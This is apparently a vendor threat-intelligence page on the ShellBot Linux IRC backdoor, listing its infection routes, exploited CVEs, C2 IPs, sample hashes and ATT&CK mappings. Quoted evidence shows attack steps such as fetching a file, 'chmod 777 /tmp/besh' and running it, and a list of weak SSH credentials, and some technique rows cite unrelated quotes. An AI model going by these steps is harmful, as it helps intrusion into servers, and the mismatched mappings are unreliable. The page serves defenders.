MalwareUsed by 1 actorExploits 5 CVEs

ShellBot

ShellBot is a Perl-based Linux bot/backdoor commonly described as an IRC bot with remote shell, scanning, and DDoS functionality. The provided reporting ties it to brute-force and dictionary attacks against weakly secured Linux SSH servers, where attackers scan for exposed SSH services, gain access with weak credentials, and install the bot. Once deployed, ShellBot connects to command-and-control infrastructure over IRC, allowing operators to issue commands, steal data, and launch DDoS attacks. It can persist through startup-script modification or cron jobs, and one report notes a variant disguised itself as an rsync process and was configured for reboot persistence via cron entries. ShellBot is also described as highly customizable, with variants including "LiGhT’s Modded perlbot v2."

The malware appears in multiple Linux-focused intrusion contexts in the source material. ASEC reported on March 13, 2023 that ShellBot was actively targeting Linux SSH servers. It is also referenced among DDoS bot families observed in honeypot telemetry against Linux SSH infrastructure in Q3 2025 and Q1 2026. Separate reporting links ShellBot delivery to exploitation of internet-exposed Cacti servers via CVE-2022-46169. Historical Shellshock exploitation also delivered ShellBot-related Perl payloads. The Outlaw group’s Linux/Unix botnet toolkit used a Perl-obfuscated installer for a Shellbot backdoor, with the bot disguising itself as rsync on infected systems.

High-confidence indicators mentioned in the content include a Perl ShellBot sample with MD5 cd23ef54e264bd84ab1a12dddceb3f48, described as connecting to 81.18.135.38 on port 443; another Perl script with MD5 b0b8a35445a4743ff6f196a4c0bba688 connecting to 94.102.52.10 on port 6667; and SHA-256 sample hashes 2220783661db230d0808a5750060950688e2618d462ccbe07f54408154c227c1, b7d62d1a145ddda241e624ef94ab31fcca1a13f79e130d0a704586e35745282a, e476b9c07fcd80824d4eafce0e826ae1c12706ca6215eb6e3995468374bb8a76, f5a26a68344c1ffd136ba73dec9d08f61212872cdba33bd4d7d32733a72e4ed5, 0857f90be97326ff45f17ec3f6ce60d9a0f6d8faed34e48527fde5ec30bd5a0d, 0c1673e442b945a0aecf60d3970e924b16bd72d46e257bd72927821e4ebbc9ca, 1f3c279ea684d5cbdc7004819bf15a160f70b2c79c4affd309f9ab3ad957045b, 5ba1d0efb313ccc20e3d5f2476a3db811e15c80c3f1ac73b7a02d80c5c49c728, a26de5b607e3a66af8b7db2c13bcd1c658817649c699f8731db6f237c3c5b1ce, and cb80570332e3e32037f426e835d05bdcd276e9e5acfd439027d788dd64dcb47d.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

EXPLOITED CVES

Vulnerabilities exploited

5 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

5 CVES

CVE-2014-6271ShellshockExploited in the wild

The exploitation of the BASH bug, now widely referred to as “Shellshock”, is in full swing... The initial patch for this vulnerability (CVE-2014-6271), which was released in sync with the vulnerability’s public disclosure, was quickly found to be inadequate. | The Perl script (md5: cd23ef54e264bd84ab1a12dddceb3f48) was first submitted to VirusTotal over a year ago and is known as ShellBot. It is an IRC bot with remote shell, scanning, and DDoS functionality.

via fireeyefireeye.com

CVE-2016-5195Dirty COWExploited in the wild

This time, the group explored unpatched systems vulnerable to CVE-2016-8655 and Dirty COW exploit (CVE-2016-5195) as attack vectors.

via trendmicro comtrendmicro.com

CVE-2016-8655Privilege Escalation via Race Condition in Linux Kernel AF_PACKET (CVE-2016-8655)Exploited in the wild

This time, the group explored unpatched systems vulnerable to CVE-2016-8655 ... as attack vectors.

via trendmicro comtrendmicro.com

CVE-2014-7169Shellshock incomplete fix in GNU Bash

The Perl script (md5: cd23ef54e264bd84ab1a12dddceb3f48) was first submitted to VirusTotal over a year ago and is known as ShellBot. It is an IRC bot with remote shell, scanning, and DDoS functionality.

via fireeyefireeye.com

CVE-2022-46169Unauthenticated Command Injection in Cacti remote_agent.phpExploited in the wild

"...allowing threat actors to breach internet-exposed Cacti servers to deliver botnet malware such as MooBot and ShellBot."

via the hacker newsthehackernews.com

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Outlaw

The a binary is a script wrapper to start run, a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system. The Shellbot disguises itself as a process named rsync... Shellbot is also used to control the botnet...

via trendmicro comtrendmicro.com

MITRE ATT&CK

Techniques & procedures

16 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques

T1078Valid AccountsEvidence1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

T1190Exploit Public-Facing ApplicationEvidence1

"In early 2023, a third critical flaw tracked as CVE-2022-46169 ... came under active exploitation in the wild, allowing threat actors to breach internet-exposed Cacti servers to deliver botnet malware such as MooBot and ShellBot."

Execution

3 techniques

T1053.003CronEvidence2

It then resets cron and removes possible cache files from other programs, starts scripts and binaries a, init0, and start, and sets the persistence by modifying the crontab.

T1059.004Unix ShellEvidence2

The a binary is a script wrapper to start run, a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system.

T1059.006PythonEvidence1

The a binary is a script wrapper to start run, a Perl-obfuscated script for installation of a Shellbot to gain control of the infected system.

Persistence

3 techniques

T1037Boot or Logon Initialization ScriptsEvidence1

After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.

T1053.003CronEvidence2

It then resets cron and removes possible cache files from other programs, starts scripts and binaries a, init0, and start, and sets the persistence by modifying the crontab.

T1078Valid AccountsEvidence1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

Privilege Escalation

3 techniques

T1037Boot or Logon Initialization ScriptsEvidence1

After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.

T1053.003CronEvidence2

It then resets cron and removes possible cache files from other programs, starts scripts and binaries a, init0, and start, and sets the persistence by modifying the crontab.

T1078Valid AccountsEvidence1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

Stealth

3 techniques

T1027Obfuscated Files or InformationEvidence1

The commands above Base64 decode the initial string into the following python code below and execute it with Python.

T1036MasqueradingEvidence1

The Shellbot disguises itself as a process named rsync, commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization.

T1078Valid AccountsEvidence1

Once access is gained, attackers execute a series of commands to download and install SuperShell...

Defense Impairment

1 technique

T1222File and Directory Permissions ModificationEvidence1

The injected BASH commands above download a file, change its permissions to read/write/execute for all users, and executes the file... chmod 777 /tmp/besh

Credential Access

1 technique

T1110Brute ForceEvidence1

The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty."

Lateral Movement

1 technique

T1021.004SSHEvidence1

SuperShell is a sophisticated backdoor malware targeting Linux SSH servers... The attack begins with brute force and dictionary attacks against SSH servers...

Command and Control

3 techniques

T1071.001Web ProtocolsEvidence2

Tsunami/Kaiten... mainly functions as a DDoS client, but also has backdoor capabilities, communicating over IRC... ShellBot... It is an IRC bot with remote shell, scanning, and DDoS functionality.

T1105Ingress Tool TransferEvidence4

Cowrie не только логирует команды — он ещё и перехватывает файлы , которые на него заливают... Все семь ботов «скачивали» на мой сервер один и тот же файл... Отпечаток у всех семи закачек оказался идентичным: a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2

T1219Remote Access ToolsEvidence1

The Shellbot script is added to run after the victim’s system reboots... Shellbot is also used to control the botnet...

Impact

2 techniques

T1498Network Denial of ServiceEvidence1

Once installed, ShellBot connects to a Command and Control (C&C) server via the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.

T1499Endpoint Denial of ServiceEvidence1

We have observed a significant amount of overtly malicious traffic leveraging BASH, including... DDoS... The idea here is to convert exploited Web servers into on-demand DDoS clients.

INDICATORS OF COMPROMISE

IOCs tracked for this family

49 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

32 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

15 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

2 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

hash.sha256●●●●●●●●●●●●View more in app4 days ago

ip.v4●●●●●●●●●●●●View more in app4 days ago

ACTIVITY FEED

Recent activity

6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

6 SOURCESView more in app

ahnlab asec blogNews

Apr 12, 2026

Q1 2026 Malware Statistics Report for Linux SSH Servers - ASEC

A named malware family included in the report tags related to Linux SSH server threats.

ahnlab asec blogNews

Oct 13, 2025

Statistics Report of Malware Targeting Linux SSH Servers in Q3 2025

ShellBot is a Linux DDoS bot used to launch denial-of-service attacks from compromised servers.

contagiodump blogNews

Sep 12, 2024

contagio: 2024-09-12 SUPERSHELL + 2023-03-13 SHELLBOT Targeting Linux SSH servers Samples

A Perl-based DDoS bot targeting Linux SSH servers by brute-forcing weak SSH credentials. After installation, it connects to a C2 server over IRC to receive commands, steal data, execute remote tasks, and launch DDoS attacks. It can persist through startup script or cron job modification and has customizable variants.

the hacker newsNews

May 14, 2024

Critical Flaws in Cacti Framework Could Let Attackers Execute Malicious Code

Botnet malware reported as a payload delivered after exploitation of internet-exposed Cacti servers (notably via CVE-2022-46169).

+2 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching49

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities5

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping16

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.